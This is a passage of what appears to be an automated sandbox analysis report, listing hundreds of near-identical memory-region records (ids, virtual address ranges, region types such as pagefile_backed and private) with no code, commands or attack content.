end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8768 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8769 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8778 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8779 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8783 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8784 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8785 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8786 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8787 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8788 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8789 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8790 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8791 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8792 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8793 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8794 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8795 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8796 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8797 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8799 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8800 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8837 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8838 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8839 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8887 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8888 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8898 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8899 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8902 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8903 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8907 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8908 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8911 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8914 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8915 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8916 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8917 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id 